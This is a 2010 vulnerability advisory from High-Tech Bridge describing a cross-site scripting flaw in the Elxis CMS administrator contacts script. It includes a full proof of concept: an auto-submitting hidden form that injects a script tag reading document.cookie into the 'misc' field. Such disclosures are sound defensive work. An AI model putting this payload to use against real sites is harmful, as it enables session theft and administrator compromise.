XSS vulnerability in Elxis CMS (contacts)

[advisory () htbridge ch]

Vulnerability ID: HTB22615
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_elxis_cms_contacts.html
Product: Elxis CMS
Vendor: Elxis Team ( http://www.elxis.org/ ) 
Vulnerable Version: 2009.2 electra rev2631 and probably prior versions
Vendor Notification: 20 September 2010 
Vulnerability Type: XSS (Cross Site Scripting)
Status: Fixed by Vendor
Risk level: Medium 
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "administrator/index2.php" script to properly sanitize user-supplied 
input in "misc" variable. Successful exploitation of this vulnerability could result in a compromise of the 
application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://eecore/elxis/administrator/index2.php"; method="post" name="main" >
<input type="hidden" name="catid" value="1" />
<input type="hidden" name="user_id" value="0" />
<input type="hidden" name="name" value="My Name" />
<input type="hidden" name="seotitle" value="sef-url" />
<input type="hidden" name="con_position" value="Website manager" />
<input type="hidden" name="email_to" value="webmaster () example com" />
<input type="hidden" name="address" value="My address" />
<input type="hidden" name="suburb" value="city" />
<input type="hidden" name="state" value="reg" />
<input type="hidden" name="country" value="country" />
<input type="hidden" name="postcode" value="12345" />
<input type="hidden" name="telephone" value="123" />
<input type="hidden" name="fax" value="123" />
<input type="hidden" name="misc" value='hello"><script>alert(document.cookie)</script>' />
<input type="hidden" name="default_con" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="ordering" value="1" />
<input type="hidden" name="access" value="29" />
<input type="hidden" name="image" value="asterisk.png" />
<input type="hidden" name="params[menu_image]" value="-1" /><input type="hidden" name="params[menu_image_only]" 
value="0" /><input type="hidden" name="params[pageclass_sfx]" value="" /><input type="hidden" name="params[print]" 
value="" /><input type="hidden" name="params[back_button]" value="" /><input type="hidden" name="params[name]" 
value="1" /><input type="hidden" name="params[position]" value="1" /><input type="hidden" name="params[email]" 
value="0" /><input type="hidden" name="params[street_address]" value="1" /><input type="hidden" name="params[suburb]" 
value="1" /><input type="hidden" name="params[state]" value="1" /><input type="hidden" name="params[country]" value="1" 
/><input type="hidden" name="params[postcode]" value="1" /><input type="hidden" name="params[telephone]" value="1" 
/><input type="hidden" name="params[fax]" value="1" /><input type="hidden" name="params[misc]" value="1" /><input 
type="hidden" name="params[vcard]" value="1" /><input type="hidden" name=!
 "params[image]" value="1" /><input type="hidden" name="params[email_description]" value="1" /><input type="hidden" 
name="params[email_description_text]" value="" /><input type="hidden" name="params[email_form]" value="1" /><input 
type="hidden" name="params[email_copy]" value="1" /><input type="hidden" name="params[drop_down]" value="0" /><input 
type="hidden" name="params[contact_icons]" value="1" /><input type="hidden" name="params[icon_address]" value="" 
/><input type="hidden" name="params[icon_email]" value="" /><input type="hidden" name="params[icon_telephone]" value="" 
/><input type="hidden" name="params[icon_fax]" value="" /><input type="hidden" name="params[icon_misc]" value="" />
<input type="hidden" name="option" value="com_contact" />
<input type="hidden" name="id" value="1" />
<input type="hidden" name="task" value="save" />
</form>
<script>
document.main.submit();
</script>

Solution: Upgrade to the most recent version